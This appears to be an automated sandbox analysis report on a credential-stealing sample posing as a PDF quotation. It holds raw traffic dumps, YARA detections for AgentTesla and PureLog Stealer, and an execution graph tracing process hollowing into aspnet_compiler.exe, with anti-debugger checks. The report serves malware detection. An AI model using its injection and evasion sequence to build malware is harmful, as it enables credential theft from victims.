                          2024-07-03 16:08:12 UTC1369INData Raw: b4 20 e2 0d 35 b1 06 e9 15 06 dc fa be 4e f0 b0 94 2c 54 e3 79 79 20 3c d5 52 ca d7 5f 1f aa 8c 63 9a d1 db f9 22 0a b5 00 68 d6 26 ce 63 db cd d3 12 c9 45 70 91 6d f2 8e 89 ef d6 06 f4 d5 70 ec 8c b6 de a1 9f ce e9 86 7f 3b 81 db 58 23 b9 4b 02 5a b4 66 93 a6 67 9a 07 94 f3 fb 07 76 95 a5 78 a6 d5 23 e1 e1 07 8b 84 55 ee 38 c7 e1 a5 34 c0 21 41 ed 61 13 14 5c 80 05 e3 40 5e b3 90 81 c2 f3 43 0e 32 c8 c8 e2 ba 95 ab 4f 42 2d 22 22 35 bd 15 76 3e 03 95 01 5d 38 73 28 3c 31 07 72 da e5 b7 48 12 5e 3b fb 92 38 b1 fe c1 a5 ff 68 66 df 52 ce e6 bf 27 21 83 c9 83 60 b6 c5 cd a3 92 60 03 4c 28 dd 99 7f 2e 9e 18 7b eb 11 91 7a 18 4f da b5 86 c7 8f 37 93 04 39 ac 92 0f 34 96 62 b1 6d c0 f4 c4 92 6d 5e 94 c8 f9 bd 1f 43 92 63 fb 39 7e 10 1e 32 09 e8 48 72 74 07 49
                          Data Ascii: 5N,Tyy <R_c"h&cEpmp;X#KZfgvx#U84!Aa\@^C2OB-""5v>]8s(<1rH^;8hfR'!``L(.{zO794bmm^Cc9~2HrtI
                          2024-07-03 16:08:12 UTC1369INData Raw: 6e 65 be 67 7a 4f 84 cd 88 ba 6a 1a fb 2b 49 8b 92 99 38 68 39 f8 55 4c 11 a6 33 80 13 1b 33 d3 4b 17 7b 99 51 b6 01 28 1b 0e 1d ad b7 12 2c 73 30 0a 11 fd 4f 4f 55 6c 22 91 df 3d 50 2c af 44 3a de ad 67 02 9e 92 1d ac 1a fd 6b b9 16 ad 3b ba 6b 22 45 53 54 1e 08 56 99 44 60 95 f9 12 c5 ac 97 61 58 2c f4 bf 11 58 7f 08 cc c5 96 9d 9d 6d 12 f9 bc b5 25 a4 42 7b db 3a cc d5 e4 b1 e0 cc a0 a3 86 4a 63 05 5d b6 9d 4d 8c 73 33 cd 4e 18 a1 76 27 bc 01 25 57 32 a1 9f 4d de e3 34 51 94 a7 3f 77 6b 03 bf a7 59 52 51 9e be b3 c2 ff 16 5f 4b d3 2e 89 4d 0b e5 13 9c f3 5e 6e cb eb 2b 10 38 1b d0 80 25 89 24 80 11 30 75 1c bb 4e f5 80 a5 01 c7 31 58 1a 0b d0 36 5b 69 aa ea b4 1b d7 87 61 fb 08 4b 1b 42 b8 8a 2f cb b7 34 45 f3 8e 42 04 58 48 8d af 70 2b 3b 82 ad 48 84
                          Data Ascii: negzOj+I8h9UL33K{Q(,s0OOUl"=P,D:gk;k"ESTVD`aX,Xm%B{:Jc]Ms3Nv'%W2M4Q?wkYRQ_K.M^n+8%$0uN1X6[iaKB/4EBXHp+;H
                          2024-07-03 16:08:12 UTC1369INData Raw: 47 02 4a a6 aa 54 a7 ef b1 d0 47 c7 2c 78 1d c6 b2 8f 8a c8 23 9b 5f a8 6b ee 53 26 dc a3 cb 94 eb 1a 1e b5 ad 5c 0f 35 56 af d6 94 1a f0 65 e3 05 6d c1 d6 32 f4 0c 22 de 67 51 01 20 61 0e 8a 16 a6 03 18 50 5e c6 a1 c6 f9 38 78 20 1f 87 79 7b c6 c3 91 c5 cf b5 f5 2d 5a a2 ed 99 0c 10 cc 06 07 b6 ff 4c 65 f1 25 51 8c db bc e7 8c ba 74 64 9a d3 43 bd 24 f5 1a c8 22 de 5d e2 e6 fe 9e e6 c7 78 59 7c 0c e5 32 fa df 11 c2 c5 f5 af 87 00 6d 43 fa 38 38 ed d6 16 a6 26 0a 7b 05 57 3d 3f 59 ef 7e cd b2 d2 25 b8 8b 1c c4 3c ef 5d d2 ea 20 5a 66 11 2c 41 16 40 40 2d 73 1e bb 78 55 5e 5d ff 7f b1 ca fd 72 9a 1c ee 26 73 01 d1 06 ee 16 5d fd 16 c8 9b 77 62 e3 56 d1 0b 4e 0e 12 c7 d2 c7 44 35 5d 0b 1f 39 83 4f 6e 6d 97 62 8f e1 51 c6 06 09 ea 72 76 a6 d3 0f 9e de e4 2f
                          Data Ascii: GJTG,x#_kS&\5Vem2"gQ aP^8x y{-ZLe%QtdC$"]xY|2mC88&{W=?Y~%<] Zf,A@@-sxU^]r&s]wbVND5]9OnmbQrv/
                          2024-07-03 16:08:12 UTC1369INData Raw: ca 1d 7e f2 5d de 04 9a 34 4f dd 15 a2 49 cd 15 69 e1 4e b1 08 04 6e ab 86 47 47 ec 31 2e 91 62 ae 37 ea 78 4e 90 54 3f 44 e8 eb 13 f0 2a 1e 28 c3 e6 ec 44 db 35 50 48 b2 70 e9 e1 74 5a 8a 39 fd 75 36 83 f2 cb 0d 06 86 8b 07 4c 6f 6f dd 0e 26 9f 34 98 d5 c8 b2 be 64 4e 41 80 0f 7a f5 c6 3d b1 e2 18 82 f7 fa b2 ee a8 3f fc 76 ba a8 9a 9a b6 62 cd 54 a2 2c a2 61 b4 c6 94 06 5d 42 78 0f 82 ed 48 7e 65 81 82 79 13 fa 6d b3 3b f7 06 37 61 0f a2 1b ac 90 49 ea ad a4 55 c8 11 24 76 bc 43 46 e5 a8 33 3c 87 28 49 89 c3 5a 90 c4 bf 9f d4 6b 3b 97 b5 4e ce 57 7d af 0c 0f a1 13 b3 05 64 e9 e3 4c d5 f6 c5 59 b1 c0 78 65 f0 7a 20 a2 e1 0e d6 e4 f9 f8 68 12 27 2b 28 48 ca 3d 29 38 eb 31 d3 ae 9c 64 60 10 47 a8 25 b4 76 1d de dd 98 15 5a 80 31 12 a7 92 6b 12 e3 54 22 fc
                          Data Ascii: ~]4OIiNnGG1.b7xNT?D*(D5PHptZ9u6Loo&4dNAz=?vbT,a]BxH~eym;7aIU$vCF3<(IZk;NW}dLYxez h'+(H=)81d`G%vZ1kT"


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:12:08:07
                          Start date:03/07/2024
                          Path:C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe"
                          Imagebase:0xb50000
                          File size:968'192 bytes
                          MD5 hash:F0A33BC19A7EDFA50259138CEAE8C2EF
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1940288788.00000000080E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:12:08:56
                          Start date:03/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          Imagebase:0xa70000
                          File size:56'368 bytes
                          MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2683739560.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:14.3%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:21.9%
                            Total number of Nodes:389
                            Total number of Limit Nodes:37
                            execution_graph 41598 2db2e40 41599 2db2e55 41598->41599 41603 2db2e80 41599->41603 41609 2db2e70 41599->41609 41600 2db2e6b 41605 2db2ea4 41603->41605 41604 2db2ee3 41604->41600 41605->41604 41615 2db3610 41605->41615 41645 2db3647 41605->41645 41680 2db3470 41605->41680 41610 2db2e80 41609->41610 41611 2db2ee3 41610->41611 41612 2db3610 4 API calls 41610->41612 41613 2db3470 4 API calls 41610->41613 41614 2db3647 4 API calls 41610->41614 41611->41600 41612->41610 41613->41610 41614->41610 41616 2db3625 41615->41616 41624 2db3647 4 API calls 41616->41624 41634 2db3470 4 API calls 41616->41634 41715 2db3959 41616->41715 41720 2db4da5 41616->41720 41725 2db3a23 41616->41725 41730 2db3a6d 41616->41730 41735 2db466d 41616->41735 41740 2db486e 41616->41740 41745 2db36f4 41616->41745 41752 2db4134 41616->41752 41757 2db4db5 41616->41757 41762 2db3936 41616->41762 41767 2db3976 41616->41767 41772 2db3931 41616->41772 41777 2db4efe 41616->41777 41782 2db39ff 41616->41782 41787 2db37b8 41616->41787 41792 2db3739 41616->41792 41797 2db3c3a 41616->41797 41802 2db457b 41616->41802 41807 2db3804 41616->41807 41812 2db3ac5 41616->41812 41817 2db4e0c 41616->41817 41822 2db40ce 41616->41822 41827 2db3c93 41616->41827 41832 2db3913 41616->41832 41837 2db3658 41616->41837 41617 2db363b 41617->41605 41624->41617 41634->41617 41646 2db35ed 41645->41646 41647 2db35f5 41646->41647 41649 2db3656 41646->41649 41653 2db3959 2 API calls 41647->41653 41654 2db3658 2 API calls 41647->41654 41655 2db3913 2 API calls 41647->41655 41656 2db3c93 2 API calls 41647->41656 41657 2db40ce 2 API calls 41647->41657 41658 2db4e0c 2 API calls 41647->41658 41659 2db3647 4 API calls 41647->41659 41660 2db3ac5 2 API calls 41647->41660 41661 2db3804 2 API calls 41647->41661 41662 2db457b 2 API calls 41647->41662 41663 2db3c3a 2 API calls 41647->41663 41664 2db3739 2 API calls 41647->41664 41665 2db37b8 2 API calls 41647->41665 41666 2db39ff 2 API calls 41647->41666 41667 2db4efe 2 API calls 41647->41667 41668 2db3931 2 API calls 41647->41668 41669 2db3470 4 API calls 41647->41669 41670 2db3976 2 API calls 41647->41670 41671 2db3936 2 API calls 41647->41671 41672 2db4db5 2 API calls 41647->41672 41673 2db4134 2 API calls 41647->41673 41674 2db36f4 4 API calls 41647->41674 41675 2db486e 2 API calls 41647->41675 41676 2db466d 2 API calls 41647->41676 41677 2db3a6d 2 API calls 41647->41677 41678 2db3a23 2 API calls 41647->41678 41679 2db4da5 2 API calls 41647->41679 41648 2db363b 41648->41605 41650 2db3e9a 41649->41650 41651 2db89e8 CheckRemoteDebuggerPresent 41649->41651 41652 2db89f0 CheckRemoteDebuggerPresent 41649->41652 41650->41605 41651->41649 41652->41649 41653->41648 41654->41648 41655->41648 41656->41648 41657->41648 41658->41648 41659->41648 41660->41648 41661->41648 41662->41648 41663->41648 41664->41648 41665->41648 41666->41648 41667->41648 41668->41648 41669->41648 41670->41648 41671->41648 41672->41648 41673->41648 41674->41648 41675->41648 41676->41648 41677->41648 41678->41648 41679->41648 41683 2db3475 41680->41683 41681 2db35f5 41688 2db3959 2 API calls 41681->41688 41689 2db3658 2 API calls 41681->41689 41690 2db3913 2 API calls 41681->41690 41691 2db3c93 2 API calls 41681->41691 41692 2db40ce 2 API calls 41681->41692 41693 2db4e0c 2 API calls 41681->41693 41694 2db3647 4 API calls 41681->41694 41695 2db3ac5 2 API calls 41681->41695 41696 2db3804 2 API calls 41681->41696 41697 2db457b 2 API calls 41681->41697 41698 2db3c3a 2 API calls 41681->41698 41699 2db3739 2 API calls 41681->41699 41700 2db37b8 2 API calls 41681->41700 41701 2db39ff 2 API calls 41681->41701 41702 2db4efe 2 API calls 41681->41702 41703 2db3931 2 API calls 41681->41703 41704 2db3470 4 API calls 41681->41704 41705 2db3976 2 API calls 41681->41705 41706 2db3936 2 API calls 41681->41706 41707 2db4db5 2 API calls 41681->41707 41708 2db4134 2 API calls 41681->41708 41709 2db36f4 4 API calls 41681->41709 41710 2db486e 2 API calls 41681->41710 41711 2db466d 2 API calls 41681->41711 41712 2db3a6d 2 API calls 41681->41712 41713 2db3a23 2 API calls 41681->41713 41714 2db4da5 2 API calls 41681->41714 41682 2db363b 41682->41605 41683->41681 41683->41682 41685 2db3656 41683->41685 41684 2db3e9a 41684->41605 41685->41684 41686 2db89e8 CheckRemoteDebuggerPresent 41685->41686 41687 2db89f0 CheckRemoteDebuggerPresent 41685->41687 41686->41685 41687->41685 41688->41682 41689->41682 41690->41682 41691->41682 41692->41682 41693->41682 41694->41682 41695->41682 41696->41682 41697->41682 41698->41682 41699->41682 41700->41682 41701->41682 41702->41682 41703->41682 41704->41682 41705->41682 41706->41682 41707->41682 41708->41682 41709->41682 41710->41682 41711->41682 41712->41682 41713->41682 41714->41682 41717 2db36da 41715->41717 41716 2db3733 41716->41617 41717->41716 41842 2db89e8 41717->41842 41846 2db89f0 41717->41846 41722 2db36da 41720->41722 41721 2db3e9a 41721->41617 41722->41721 41723 2db89e8 CheckRemoteDebuggerPresent 41722->41723 41724 2db89f0 CheckRemoteDebuggerPresent 41722->41724 41723->41722 41724->41722 41727 2db36da 41725->41727 41726 2db3733 41726->41617 41727->41726 41728 2db89e8 CheckRemoteDebuggerPresent 41727->41728 41729 2db89f0 CheckRemoteDebuggerPresent 41727->41729 41728->41727 41729->41727 41731 2db36da 41730->41731 41732 2db3733 41731->41732 41733 2db89e8 CheckRemoteDebuggerPresent 41731->41733 41734 2db89f0 CheckRemoteDebuggerPresent 41731->41734 41732->41617 41733->41731 41734->41731 41737 2db36da 41735->41737 41736 2db3e9a 41736->41617 41737->41736 41738 2db89e8 CheckRemoteDebuggerPresent 41737->41738 41739 2db89f0 CheckRemoteDebuggerPresent 41737->41739 41738->41737 41739->41737 41741 2db36da 41740->41741 41742 2db3e9a 41741->41742 41743 2db89e8 CheckRemoteDebuggerPresent 41741->41743 41744 2db89f0 CheckRemoteDebuggerPresent 41741->41744 41742->41617 41743->41741 41744->41741 41850 2dbc418 KiUserCallbackDispatcher 41745->41850 41852 2dbc408 KiUserCallbackDispatcher 41745->41852 41746 2db3733 41746->41617 41747 2db36da 41747->41746 41748 2db89e8 CheckRemoteDebuggerPresent 41747->41748 41749 2db89f0 CheckRemoteDebuggerPresent 41747->41749 41748->41747 41749->41747 41754 2db36da 41752->41754 41753 2db3e9a 41753->41617 41754->41753 41755 2db89e8 CheckRemoteDebuggerPresent 41754->41755 41756 2db89f0 CheckRemoteDebuggerPresent 41754->41756 41755->41754 41756->41754 41759 2db36da 41757->41759 41758 2db3e9a 41758->41617 41759->41758 41760 2db89e8 CheckRemoteDebuggerPresent 41759->41760 41761 2db89f0 CheckRemoteDebuggerPresent 41759->41761 41760->41759 41761->41759 41764 2db36da 41762->41764 41763 2db3733 41763->41617 41764->41763 41765 2db89e8 CheckRemoteDebuggerPresent 41764->41765 41766 2db89f0 CheckRemoteDebuggerPresent 41764->41766 41765->41764 41766->41764 41769 2db36da 41767->41769 41768 2db3733 41768->41617 41769->41768 41770 2db89e8 CheckRemoteDebuggerPresent 41769->41770 41771 2db89f0 CheckRemoteDebuggerPresent 41769->41771 41770->41769 41771->41769 41774 2db36da 41772->41774 41773 2db3733 41773->41617 41774->41773 41775 2db89e8 CheckRemoteDebuggerPresent 41774->41775 41776 2db89f0 CheckRemoteDebuggerPresent 41774->41776 41775->41774 41776->41774 41779 2db36da 41777->41779 41778 2db3e9a 41778->41617 41779->41778 41780 2db89e8 CheckRemoteDebuggerPresent 41779->41780 41781 2db89f0 CheckRemoteDebuggerPresent 41779->41781 41780->41779 41781->41779 41784 2db36da 41782->41784 41783 2db3733 41783->41617 41784->41783 41785 2db89e8 CheckRemoteDebuggerPresent 41784->41785 41786 2db89f0 CheckRemoteDebuggerPresent 41784->41786 41785->41784 41786->41784 41788 2db36da 41787->41788 41789 2db3733 41788->41789 41790 2db89e8 CheckRemoteDebuggerPresent 41788->41790 41791 2db89f0 CheckRemoteDebuggerPresent 41788->41791 41789->41617 41790->41788 41791->41788 41793 2db36da 41792->41793 41794 2db3733 41793->41794 41795 2db89e8 CheckRemoteDebuggerPresent 41793->41795 41796 2db89f0 CheckRemoteDebuggerPresent 41793->41796 41794->41617 41795->41793 41796->41793 41799 2db36da 41797->41799 41798 2db3e9a 41798->41617 41799->41798 41800 2db89e8 CheckRemoteDebuggerPresent 41799->41800 41801 2db89f0 CheckRemoteDebuggerPresent 41799->41801 41800->41799 41801->41799 41804 2db36da 41802->41804 41803 2db3e9a 41803->41617 41804->41803 41805 2db89e8 CheckRemoteDebuggerPresent 41804->41805 41806 2db89f0 CheckRemoteDebuggerPresent 41804->41806 41805->41804 41806->41804 41809 2db36da 41807->41809 41808 2db3733 41808->41617 41809->41808 41810 2db89e8 CheckRemoteDebuggerPresent 41809->41810 41811 2db89f0 CheckRemoteDebuggerPresent 41809->41811 41810->41809 41811->41809 41814 2db36da 41812->41814 41813 2db3733 41813->41617 41814->41813 41815 2db89e8 CheckRemoteDebuggerPresent 41814->41815 41816 2db89f0 CheckRemoteDebuggerPresent 41814->41816 41815->41814 41816->41814 41819 2db36da 41817->41819 41818 2db3e9a 41818->41617 41819->41818 41820 2db89e8 CheckRemoteDebuggerPresent 41819->41820 41821 2db89f0 CheckRemoteDebuggerPresent 41819->41821 41820->41819 41821->41819 41824 2db36da 41822->41824 41823 2db3e9a 41823->41617 41824->41823 41825 2db89e8 CheckRemoteDebuggerPresent 41824->41825 41826 2db89f0 CheckRemoteDebuggerPresent 41824->41826 41825->41824 41826->41824 41829 2db36da 41827->41829 41828 2db3e9a 41828->41617 41829->41828 41830 2db89e8 CheckRemoteDebuggerPresent 41829->41830 41831 2db89f0 CheckRemoteDebuggerPresent 41829->41831 41830->41829 41831->41829 41834 2db36da 41832->41834 41833 2db3733 41833->41617 41834->41833 41835 2db89e8 CheckRemoteDebuggerPresent 41834->41835 41836 2db89f0 CheckRemoteDebuggerPresent 41834->41836 41835->41834 41836->41834 41839 2db3682 41837->41839 41838 2db3e9a 41838->41617 41839->41838 41840 2db89e8 CheckRemoteDebuggerPresent 41839->41840 41841 2db89f0 CheckRemoteDebuggerPresent 41839->41841 41840->41839 41841->41839 41843 2db8a30 CheckRemoteDebuggerPresent 41842->41843 41845 2db8a76 41843->41845 41845->41717 41847 2db8a30 CheckRemoteDebuggerPresent 41846->41847 41849 2db8a76 41847->41849 41849->41717 41851 2dbc479 41850->41851 41851->41747 41853 2dbc479 41852->41853 41853->41747 41854 2dd37f0 41855 2dd3805 41854->41855 41860 2dd3830 41855->41860 41865 2dd3a03 41855->41865 41870 2dd3820 41855->41870 41856 2dd381b 41862 2dd385a 41860->41862 41861 2dd38a2 41861->41856 41862->41861 41875 2dd49e1 41862->41875 41880 2dd49f0 41862->41880 41867 2dd3887 41865->41867 41866 2dd38a2 41866->41856 41867->41866 41868 2dd49e1 10 API calls 41867->41868 41869 2dd49f0 10 API calls 41867->41869 41868->41867 41869->41867 41872 2dd3830 41870->41872 41871 2dd38a2 41871->41856 41872->41871 41873 2dd49e1 10 API calls 41872->41873 41874 2dd49f0 10 API calls 41872->41874 41873->41872 41874->41872 41876 2dd49f0 41875->41876 41885 2dd4a40 41876->41885 41890 2dd4a30 41876->41890 41877 2dd4a27 41877->41862 41881 2dd4a05 41880->41881 41883 2dd4a40 10 API calls 41881->41883 41884 2dd4a30 10 API calls 41881->41884 41882 2dd4a27 41882->41862 41883->41882 41884->41882 41886 2dd4a6d 41885->41886 41887 2dd4b55 41886->41887 41895 2dd50b0 41886->41895 41910 2dd50a0 41886->41910 41887->41877 41892 2dd4a40 41890->41892 41891 2dd4b55 41891->41877 41892->41891 41893 2dd50b0 10 API calls 41892->41893 41894 2dd50a0 10 API calls 41892->41894 41893->41892 41894->41892 41896 2dd50c5 41895->41896 41897 2dd50e7 41896->41897 41925 2dd57eb 41896->41925 41930 2dd5388 41896->41930 41935 2dd582e 41896->41935 41939 2dd5f6d 41896->41939 41945 2dd5d72 41896->41945 41949 2dd52d9 41896->41949 41954 2dd549d 41896->41954 41959 2dd5523 41896->41959 41964 2dd5cc0 41896->41964 41969 2dd5ca6 41896->41969 41975 2dd5e87 41896->41975 41979 2dd58a7 41896->41979 41897->41886 41911 2dd50b0 41910->41911 41912 2dd50e7 41911->41912 41913 2dd549d 2 API calls 41911->41913 41914 2dd52d9 2 API calls 41911->41914 41915 2dd5d72 2 API calls 41911->41915 41916 2dd5f6d 2 API calls 41911->41916 41917 2dd582e 2 API calls 41911->41917 41918 2dd5388 2 API calls 41911->41918 41919 2dd57eb 2 API calls 41911->41919 41920 2dd58a7 2 API calls 41911->41920 41921 2dd5e87 2 API calls 41911->41921 41922 2dd5ca6 2 API calls 41911->41922 41923 2dd5cc0 2 API calls 41911->41923 41924 2dd5523 2 API calls 41911->41924 41912->41886 41913->41912 41914->41912 41915->41912 41916->41912 41917->41912 41918->41912 41919->41912 41920->41912 41921->41912 41922->41912 41923->41912 41924->41912 41926 2dd59e5 41925->41926 41927 2dd51d2 41925->41927 41985 2db7198 41926->41985 41989 2db71a0 41926->41989 41931 2dd5392 41930->41931 41993 2db7879 41931->41993 41997 2db7880 41931->41997 41932 2dd51d2 41937 2db7198 Wow64SetThreadContext 41935->41937 41938 2db71a0 Wow64SetThreadContext 41935->41938 41936 2dd5848 41937->41936 41938->41936 41940 2dd582d 41939->41940 41942 2dd51d2 41939->41942 41943 2db7198 Wow64SetThreadContext 41940->41943 41944 2db71a0 Wow64SetThreadContext 41940->41944 41941 2dd5848 41943->41941 41944->41941 42001 2dd77e9 41945->42001 42006 2dd77f8 41945->42006 41946 2dd5d9c 41950 2dd52f1 41949->41950 42011 2dd6610 41950->42011 42016 2dd6600 41950->42016 41951 2dd5309 41955 2dd54a7 41954->41955 42039 2dd7749 41955->42039 42044 2dd7758 41955->42044 41956 2dd51d2 41960 2dd552d 41959->41960 42057 2dd7841 41960->42057 42062 2dd7850 41960->42062 41961 2dd555c 41965 2dd51d2 41964->41965 41966 2dd5388 41964->41966 41967 2db7879 WriteProcessMemory 41966->41967 41968 2db7880 WriteProcessMemory 41966->41968 41967->41965 41968->41965 41970 2dd549d 41969->41970 41971 2dd5cb0 41969->41971 41973 2dd7749 2 API calls 41970->41973 41974 2dd7758 2 API calls 41970->41974 41972 2dd51d2 41973->41972 41974->41972 41977 2db7879 WriteProcessMemory 41975->41977 41978 2db7880 WriteProcessMemory 41975->41978 41976 2dd51d2 41977->41976 41978->41976 41980 2dd58b4 41979->41980 41981 2dd5523 41979->41981 41983 2dd7841 2 API calls 41981->41983 41984 2dd7850 2 API calls 41981->41984 41982 2dd555c 41983->41982 41984->41982 41986 2db71a0 Wow64SetThreadContext 41985->41986 41988 2db722d 41986->41988 41988->41927 41990 2db71e5 Wow64SetThreadContext 41989->41990 41992 2db722d 41990->41992 41992->41927 41994 2db7880 WriteProcessMemory 41993->41994 41996 2db7916 41994->41996 41996->41932 41998 2db78c5 WriteProcessMemory 41997->41998 42000 2db7916 41998->42000 42000->41932 42002 2dd77f8 42001->42002 42004 2db7879 WriteProcessMemory 42002->42004 42005 2db7880 WriteProcessMemory 42002->42005 42003 2dd782f 42003->41946 42004->42003 42005->42003 42007 2dd780d 42006->42007 42009 2db7879 WriteProcessMemory 42007->42009 42010 2db7880 WriteProcessMemory 42007->42010 42008 2dd782f 42008->41946 42009->42008 42010->42008 42012 2dd6627 42011->42012 42013 2dd6649 42012->42013 42021 2dd677c 42012->42021 42026 2dd67d5 42012->42026 42013->41951 42017 2dd6610 42016->42017 42018 2dd677c 2 API calls 42017->42018 42019 2dd67d5 2 API calls 42017->42019 42020 2dd6649 42017->42020 42018->42020 42019->42020 42020->41951 42022 2dd6785 42021->42022 42031 2db6ea8 42022->42031 42035 2db6e9d 42022->42035 42027 2dd67fa 42026->42027 42029 2db6ea8 CreateProcessA 42027->42029 42030 2db6e9d CreateProcessA 42027->42030 42028 2dd6e50 42029->42028 42030->42028 42032 2db6f0c CreateProcessA 42031->42032 42034 2db7094 42032->42034 42036 2db6f0c CreateProcessA 42035->42036 42038 2db7094 42036->42038 42040 2dd7758 42039->42040 42049 2db7689 42040->42049 42053 2db7690 42040->42053 42041 2dd778f 42041->41956 42045 2dd776d 42044->42045 42047 2db7689 VirtualAllocEx 42045->42047 42048 2db7690 VirtualAllocEx 42045->42048 42046 2dd778f 42046->41956 42047->42046 42048->42046 42050 2db7690 VirtualAllocEx 42049->42050 42052 2db770d 42050->42052 42052->42041 42054 2db76d0 VirtualAllocEx 42053->42054 42056 2db770d 42054->42056 42056->42041 42058 2dd7850 42057->42058 42067 2db7b28 42058->42067 42071 2db7b23 42058->42071 42059 2dd787b 42059->41961 42063 2dd7865 42062->42063 42065 2db7b28 ResumeThread 42063->42065 42066 2db7b23 ResumeThread 42063->42066 42064 2dd787b 42064->41961 42065->42064 42066->42064 42068 2db7b68 ResumeThread 42067->42068 42070 2db7b99 42068->42070 42070->42059 42072 2db7b28 ResumeThread 42071->42072 42074 2db7b99 42072->42074 42074->42059

                            Executed Functions

                            Function 02DF0040 Relevance: 2.4, Strings: 1, Instructions: 1103COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: c5889140279ca85607659debb3bcdfbecc3d4a81282b59ef3b32b059c0996610
                            • Instruction ID: f028a47a2a019bc6e5225a1ac0a595440c504a9b6c8316a23cc3649a2a0f9055
                            • Opcode Fuzzy Hash: c5889140279ca85607659debb3bcdfbecc3d4a81282b59ef3b32b059c0996610
                            • Instruction Fuzzy Hash: 8DB2F734A00218CFDB54CFA4C994BADB7B5BB48705F1581A9E605AB3A9DB70EC81CF54
                            Function 02DF0367 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1917239980.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2df0000_QUOTATION_JULQTRA071244#U00faPDF.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: 62ecb73884364161cc19946fce02f4f1fc5f7d1e8741a97390d4615356e4fb86
                            • Instruction ID: f017e0e4d3b28ff766ed6b6193b96ccadfc2c2b5a586f5cb3828346177250be3
                            • Opcode Fuzzy Hash: 62ecb73884364161cc19946fce02f4f1fc5f7d1e8741a97390d4615356e4fb86
                            • Instruction Fuzzy Hash: CD220A34A00218CFDB64CFA4C994BA9B7B5FF48305F1581A9EA09AB396DB70DD81CF54
                            Function 02DB89F0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 790 2db89f0-2db8a74 CheckRemoteDebuggerPresent 793 2db8a7d-2db8ac0 790->793 794 2db8a76-2db8a7c 790->794 794->793
                            APIs
                            • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02DB8A67
                            Memory Dump Source
